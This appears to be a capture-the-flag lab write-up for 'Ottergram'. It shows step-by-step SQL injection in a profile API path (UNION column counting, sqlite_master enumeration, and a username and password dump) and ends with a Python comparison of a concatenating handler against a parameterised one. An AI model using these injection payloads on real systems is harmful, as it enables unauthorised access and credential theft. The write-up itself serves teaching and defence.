# Ottergram

Level: Easy\
Points: 10\
Type: Daily Challenge

Lab Interface

<figure><img src="https://559802299-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F8C3FiojCIEtxH7nox2Do%2Fuploads%2FhyelrHjRmb73mA6qAoPi%2Fimage.png?alt=media&#x26;token=32c7c8d5-4edf-4829-9d3a-3bf0d0de72f3" alt=""><figcaption></figcaption></figure>

Interesting request

```
GET /api/profile/sushil
```

<figure><img src="https://559802299-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F8C3FiojCIEtxH7nox2Do%2Fuploads%2FkrnqASp3N0hb3qxdfXNY%2Fimage.png?alt=media&#x26;token=edd05a06-0839-45f5-80dc-f49aa4a10552" alt=""><figcaption></figcaption></figure>

Possible SQLi in the path parameter.\
Using the simple payload `' or 1=1 -- -` proves this parameter is indeed vulnerable to SQLi.

<figure><img src="https://559802299-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F8C3FiojCIEtxH7nox2Do%2Fuploads%2FcSGk6PuhXzxoZZkS50Mq%2Fimage.png?alt=media&#x26;token=d279d6b4-7edb-4ca1-b133-fad85c7efa34" alt=""><figcaption></figcaption></figure>

Next step: finding the number of columns. Using the union select method, I found the number of columns = 7.

```
' union select 1,2,3,4,5,6,7 -- -
```

<figure><img src="https://559802299-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F8C3FiojCIEtxH7nox2Do%2Fuploads%2FODkmcltcYpNrc3Xp0JGI%2Fimage.png?alt=media&#x26;token=5763724d-c897-49ef-9f8f-e0edc5433758" alt=""><figcaption></figcaption></figure>

Using [PayloadsAllTheThings SQLi Cheatsheet](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection#dbms-identification), I found the database to be SQLite.

Next is dumping the table names.

```
' union select 1,2,3,4,5,6,group_concat(tbl_name) from sqlite_master -- -
```

<figure><img src="https://559802299-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F8C3FiojCIEtxH7nox2Do%2Fuploads%2FbyLiUzq0SDLmZY5xTSmC%2Fimage.png?alt=media&#x26;token=f5851609-9957-41f2-ba59-70a846b4b51d" alt=""><figcaption></figcaption></figure>

The `users` table looks interesting.

Next step is to get the column names from the `users` table.

```
' union select 1,2,3,4,5,6,MAX(sql) from sqlite_master WHERE tbl_name='users' -- -
```

<figure><img src="https://559802299-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F8C3FiojCIEtxH7nox2Do%2Fuploads%2FBs0r9tg6mn1oUkBtc810%2Fimage.png?alt=media&#x26;token=dc59e702-90a2-4992-8eea-c600e96f8bd9" alt=""><figcaption></figcaption></figure>

Two interesting columns in the `users` table are `username` and `password`. Dumping them as:

```
' union select 1,2,3,4,5,username,password from users -- -
```

<figure><img src="https://559802299-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F8C3FiojCIEtxH7nox2Do%2Fuploads%2FiarmrYtBVoppkAubhcc4%2Fimage.png?alt=media&#x26;token=8bdb03a5-f132-4ab3-8cfa-09cdfbd2319d" alt=""><figcaption></figcaption></figure>

Got the flag.
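
Every step above works because the username from the path is concatenated into a SQLite query. The following is an added example, not the lab's code: the `profiles` table, its column names, the stored values and all function names are assumptions. It runs the payloads from this write-up through a concatenating handler and through one that binds the value as a parameter.

```python
import sqlite3

PAGE_PAYLOADS = [  # the payloads used in the write-up above
    "' or 1=1 -- -",
    "' union select 1,2,3,4,5,6,7 -- -",
    "' union select 1,2,3,4,5,username,password from users -- -",
]

def make_db():
    # Constructed stand-in for the lab database. The profile table has 7
    # columns to match the count found above; its name and columns are assumed.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE profiles (id, username, name, bio, avatar, followers, posts)")
    db.execute("CREATE TABLE users (id, username, password)")
    db.execute("INSERT INTO profiles VALUES (1, 'sushil', 'Sushil', 'bio', 'a.png', 3, 7)")
    db.execute("INSERT INTO profiles VALUES (2, 'admin', 'Admin', 'bio', 'b.png', 9, 1)")
    db.execute("INSERT INTO users VALUES (1, 'admin', 'constructed-secret')")
    return db

def profile_vulnerable(db, username):
    # The path segment is concatenated into the statement, so a quote in the
    # input closes the string literal and the rest is parsed as SQL.
    sql = "SELECT * FROM profiles WHERE username = '" + username + "'"
    return db.execute(sql).fetchall()

def profile_safe(db, username):
    # Bound parameter: the input is only ever compared as a value.
    sql = "SELECT * FROM profiles WHERE username = ?"
    return db.execute(sql, (username,)).fetchall()

def compare(db):
    # Rows returned by (vulnerable, safe) handler for each payload.
    return {p: (len(profile_vulnerable(db, p)), len(profile_safe(db, p)))
            for p in PAGE_PAYLOADS}

if __name__ == "__main__":
    for payload, counts in compare(make_db()).items():
        print(counts, payload)
```

With the bound parameter, each payload is looked up as a literal username and matches no row, while a normal lookup such as `sushil` behaves the same in both handlers.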
